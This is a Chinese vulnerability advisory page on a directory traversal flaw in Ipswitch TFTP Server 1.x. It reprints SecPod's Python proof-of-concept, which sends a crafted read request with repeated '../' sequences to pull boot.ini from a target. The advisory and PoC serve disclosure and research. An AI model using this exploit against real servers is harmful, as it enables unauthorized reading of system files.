Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Ipswitch TFTP Server目录遍历漏洞

发布日期:2011-12-02
更新日期:2011-12-05受影响系统:
Ipswitch Ipswitch TFTP Server  1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 50890Ipswitch TFTP Server是免费的网络系统或配置文件传输工具。Ipswitch TFTP Server在处理包含../序列的Read请求的实现上存在验证错误漏洞,通过目录遍历攻击可导致下载或上传根目录之外的任意文件。<*来源:SecPod Research
 
  链接:http://secpod.org/blog/?p=424
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : http://secpod.org/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################
import sys, socketdef sendPacket(HOST, PORT, data):
    """
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    """
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()
    return dataif __name__ == "__main__":    if len(sys.argv) < 2:
        print " Usage: python exploit.py target_ip"
        print " Example : python exploit.py 127.0.0.1"
        print " Exiting..."
        sys.exit(0)    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port    data = "x00x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "x00"         ## Read boot.ini file using directory traversal
    data += "netasciix00"                           ## TFTP Type    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()建议:
--------------------------------------------------------------------------------
厂商补丁:Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.ipswitch.com/HS TFTP服务器多个远程拒绝服务漏洞CoDeSys多个远程拒绝服务漏洞相关资讯      漏洞  Ipswitch TFTP Server 
  • 快递官网漏洞泄露 1400 万用户信息  (08/12/2014 08:37:42)
  • 要389目录服务器访问绕过漏洞  (10/01/2012 09:18:08)
  • ASUS Net4Switch "ipswcom.dll"   (03/02/2012 09:32:42)
  • 软件漏洞是一笔大买卖!  (10/06/2012 08:28:32)
  • PHPCMS V9.1.13任意文件包含漏洞分  (08/01/2012 07:23:17)
  • Open Handset Alliance Android   (03/01/2012 06:59:34)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受